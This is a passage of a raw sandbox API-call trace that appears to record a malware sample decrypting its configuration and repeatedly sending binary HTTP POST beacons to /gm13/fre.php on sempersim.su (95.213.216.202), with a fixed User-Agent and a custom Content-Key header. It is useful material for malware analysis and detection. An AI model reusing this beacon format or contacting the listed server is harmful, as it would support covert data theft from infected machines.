Size=0xae) returned 0x63d6b8 [0141.626] GetProcessHeap () returned 0x620000 [0141.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0141.626] GetProcessHeap () returned 0x620000 [0141.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643638 [0141.626] GetProcessHeap () returned 0x620000 [0141.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0141.627] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0141.628] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0141.628] GetProcessHeap () returned 0x620000 [0141.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0141.628] GetProcessHeap () returned 0x620000 [0141.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0141.628] send (s=0x2e4, buf=0x63a880*, len=237, flags=0) returned 237 [0141.629] send (s=0x2e4, buf=0x6421e0*, len=159, flags=0) returned 159 [0141.629] GetProcessHeap () returned 0x620000 [0141.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0141.629] recv (in: s=0x2e4, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0143.446] GetProcessHeap () returned 0x620000 [0143.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0143.446] GetProcessHeap () returned 0x620000 [0143.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643638 | out: hHeap=0x620000) returned 1 [0143.446] GetProcessHeap () returned 0x620000 [0143.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0143.446] GetProcessHeap () returned 0x620000 [0143.447] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba08 | out: hHeap=0x620000) returned 1 [0143.447] closesocket (s=0x2e4) returned 0 [0143.447] GetProcessHeap () returned 0x620000 [0143.447] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b5d0 | out: hHeap=0x620000) returned 1 [0143.447] GetProcessHeap () returned 0x620000 [0143.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0143.449] GetProcessHeap () returned 0x620000 [0143.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643560 | out: hHeap=0x620000) returned 1 [0143.449] GetProcessHeap () returned 0x620000 [0143.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633318 | out: hHeap=0x620000) returned 1 [0143.450] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x53c) returned 0x2e4 [0143.451] Sleep (dwMilliseconds=0xea60) [0143.467] GetProcessHeap () returned 0x620000 [0143.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643128 [0143.468] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0143.468] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0143.479] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0143.483] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0143.491] GetProcessHeap () returned 0x620000 [0143.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0143.492] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0143.492] CryptImportKey (in: hProv=0x63b7e8, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0143.493] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0143.493] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0143.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0143.494] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0143.494] GetProcessHeap () returned 0x620000 [0143.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0143.499] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0143.499] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643128, pdwDataLen=0x19fcfc | out: pbData=0x643128, pdwDataLen=0x19fcfc) returned 1 [0143.499] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0143.500] CryptDestroyKey (hKey=0x62d710) returned 1 [0143.500] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0143.501] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0143.501] GetProcessHeap () returned 0x620000 [0143.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0143.501] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0143.502] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0143.502] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0143.503] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0143.503] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0143.504] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0143.504] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0143.505] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0143.505] GetProcessHeap () returned 0x620000 [0143.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0143.505] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0143.505] GetProcessHeap () returned 0x620000 [0143.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0143.506] GetProcessHeap () returned 0x620000 [0143.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0143.506] GetProcessHeap () returned 0x620000 [0143.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643128 | out: hHeap=0x620000) returned 1 [0143.506] GetProcessHeap () returned 0x620000 [0143.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643008 [0143.507] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0143.507] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0143.517] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0143.517] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0143.524] GetProcessHeap () returned 0x620000 [0143.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0143.525] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0143.525] CryptImportKey (in: hProv=0x63b7e8, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0143.526] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0143.526] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0143.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0143.529] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0143.529] GetProcessHeap () returned 0x620000 [0143.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0143.530] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0143.531] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643008, pdwDataLen=0x19fcfc | out: pbData=0x643008, pdwDataLen=0x19fcfc) returned 1 [0143.532] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0143.532] CryptDestroyKey (hKey=0x62d710) returned 1 [0143.533] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0143.533] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0143.533] GetProcessHeap () returned 0x620000 [0143.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0143.534] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0143.534] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0143.535] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0143.535] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0143.536] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0143.536] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0143.536] GetProcessHeap () returned 0x620000 [0143.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0143.536] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x644440*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ebb0*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0143.540] GetProcessHeap () returned 0x620000 [0143.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b590 [0143.540] socket (af=2, type=1, protocol=6) returned 0x2e8 [0143.541] connect (s=0x2e8, name=0x63ebb0*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0143.590] FreeAddrInfoW (pAddrInfo=0x644440*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ebb0*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0143.590] GetProcessHeap () returned 0x620000 [0143.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba08 [0143.590] GetProcessHeap () returned 0x620000 [0143.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x643d58 [0143.591] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0143.592] wvsprintfA (in: param_1=0x643d58, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0143.592] GetProcessHeap () returned 0x620000 [0143.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0143.592] GetProcessHeap () returned 0x620000 [0143.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643d58 | out: hHeap=0x620000) returned 1 [0143.593] GetProcessHeap () returned 0x620000 [0143.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643200 [0143.593] GetProcessHeap () returned 0x620000 [0143.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x643d58 [0143.593] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0143.594] wvsprintfA (in: param_1=0x643d58, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0143.594] GetProcessHeap () returned 0x620000 [0143.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0143.594] GetProcessHeap () returned 0x620000 [0143.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643d58 | out: hHeap=0x620000) returned 1 [0143.595] send (s=0x2e8, buf=0x63a880*, len=237, flags=0) returned 237 [0143.596] send (s=0x2e8, buf=0x6421e0*, len=159, flags=0) returned 159 [0143.596] GetProcessHeap () returned 0x620000 [0143.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x643d58 [0143.596] recv (in: s=0x2e8, buf=0x643d58, len=4048, flags=0 | out: buf=0x643d58*) returned 237 [0145.616] GetProcessHeap () returned 0x620000 [0145.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0145.616] GetProcessHeap () returned 0x620000 [0145.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643200 | out: hHeap=0x620000) returned 1 [0145.617] GetProcessHeap () returned 0x620000 [0145.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0145.617] GetProcessHeap () returned 0x620000 [0145.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba08 | out: hHeap=0x620000) returned 1 [0145.617] closesocket (s=0x2e8) returned 0 [0145.618] GetProcessHeap () returned 0x620000 [0145.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b590 | out: hHeap=0x620000) returned 1 [0145.618] GetProcessHeap () returned 0x620000 [0145.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0145.618] GetProcessHeap () returned 0x620000 [0145.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643008 | out: hHeap=0x620000) returned 1 [0145.619] GetProcessHeap () returned 0x620000 [0145.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0145.619] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x643d58, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x398) returned 0x2e8 [0145.620] Sleep (dwMilliseconds=0xea60) [0145.635] GetProcessHeap () returned 0x620000 [0145.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643368 [0145.636] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0145.636] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0145.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0145.642] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0145.649] GetProcessHeap () returned 0x620000 [0145.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0145.649] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0145.649] CryptImportKey (in: hProv=0x63ba08, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0145.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0145.650] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0145.651] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0145.651] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0145.651] GetProcessHeap () returned 0x620000 [0145.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0145.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0145.655] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643368, pdwDataLen=0x19fcfc | out: pbData=0x643368, pdwDataLen=0x19fcfc) returned 1 [0145.656] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0145.656] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0145.657] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0145.657] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0145.657] GetProcessHeap () returned 0x620000 [0145.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0145.658] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0145.658] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0145.659] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0145.659] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0145.660] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0145.660] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0145.661] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0145.661] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0145.661] GetProcessHeap () returned 0x620000 [0145.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0145.662] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0145.662] GetProcessHeap () returned 0x620000 [0145.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0145.662] GetProcessHeap () returned 0x620000 [0145.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0145.663] GetProcessHeap () returned 0x620000 [0145.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643368 | out: hHeap=0x620000) returned 1 [0145.663] GetProcessHeap () returned 0x620000 [0145.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643488 [0145.664] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0145.664] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0145.674] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0145.675] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0145.682] GetProcessHeap () returned 0x620000 [0145.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0145.683] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0145.685] CryptImportKey (in: hProv=0x63b7e8, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0145.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0145.687] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0145.687] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0145.688] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0145.688] GetProcessHeap () returned 0x620000 [0145.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0145.689] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0145.689] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643488, pdwDataLen=0x19fcfc | out: pbData=0x643488, pdwDataLen=0x19fcfc) returned 1 [0145.690] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0145.690] CryptDestroyKey (hKey=0x62d710) returned 1 [0145.691] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0145.691] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0145.691] GetProcessHeap () returned 0x620000 [0145.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0145.692] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0145.692] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0145.693] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0145.693] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0145.694] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0145.694] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0145.695] GetProcessHeap () returned 0x620000 [0145.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0145.695] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x644508*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ead8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0145.696] GetProcessHeap () returned 0x620000 [0145.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b540 [0145.697] socket (af=2, type=1, protocol=6) returned 0x2ec [0145.697] connect (s=0x2ec, name=0x63ead8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0145.773] FreeAddrInfoW (pAddrInfo=0x644508*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ead8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0145.773] GetProcessHeap () returned 0x620000 [0145.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63bcb0 [0145.773] GetProcessHeap () returned 0x620000 [0145.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0145.773] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0145.774] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0145.774] GetProcessHeap () returned 0x620000 [0145.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0145.774] GetProcessHeap () returned 0x620000 [0145.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0145.775] GetProcessHeap () returned 0x620000 [0145.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643050 [0145.775] GetProcessHeap () returned 0x620000 [0145.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0145.776] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0145.776] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0145.776] GetProcessHeap () returned 0x620000 [0145.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0145.777] GetProcessHeap () returned 0x620000 [0145.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0145.777] send (s=0x2ec, buf=0x63a880*, len=237, flags=0) returned 237 [0145.778] send (s=0x2ec, buf=0x6421e0*, len=159, flags=0) returned 159 [0145.778] GetProcessHeap () returned 0x620000 [0145.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0145.778] recv (in: s=0x2ec, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0147.788] GetProcessHeap () returned 0x620000 [0147.789] HeapFree (in: hHeap=0x620000, 